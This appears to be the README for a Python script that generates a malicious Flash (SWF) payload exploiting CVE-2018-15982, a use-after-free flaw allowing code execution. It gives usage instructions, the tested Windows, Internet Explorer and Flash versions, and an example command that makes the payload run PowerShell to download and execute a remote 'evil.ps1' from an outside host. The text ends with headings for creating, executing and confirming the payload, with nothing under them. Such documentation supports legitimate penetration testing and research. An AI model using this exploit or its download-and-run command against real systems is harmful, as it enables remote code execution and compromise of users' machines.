This script creates a swf payload for CVE-2018-15982, which is based off of the PoC from https://github.com/smgorelik/Windows-RCE-exploits. The vulnerability was discovered by Chenming Xu and Ed Miles of Gigamon ATR.
The vulnerability is a use-after-free flaw enabling arbitrary code-execution in Flash. More information can be found in the links below.
- https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982
Note: Currently only spraying one block, I noticed this after I created the script.
Usage:
python create_swf.py <command> <output file name>
Example Usage:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
Tested on:
- Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
- Adobe Flash 31.0.0.153, 29.0.0.140
Create payload:
Executing payload:
Confirm execution:
